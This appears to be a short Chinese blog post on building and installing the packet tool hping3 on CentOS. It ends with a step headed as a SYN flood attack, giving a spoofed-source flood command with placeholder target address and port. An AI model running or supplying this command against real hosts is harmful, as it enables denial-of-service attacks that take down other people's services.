CentOS hping3安装

  1. 安装libpcap-devel和tcl-devel
yum -y install libpcap-devel tcl-devel
  1. 从github上clone源代码
git clone https://github.com/antirez/hping.git
  1. 运行配置脚本
cd hping
./configure
  1. 编译
make
  1. 安装
make install
  1. hping3 SYN洪流攻击
hping3 --rand-source [dst_ip] -p [dst_port] -S --flood
posted @ 2018-07-22 23:26  EmrysChe  阅读(6114)  评论(0编辑  收藏  举报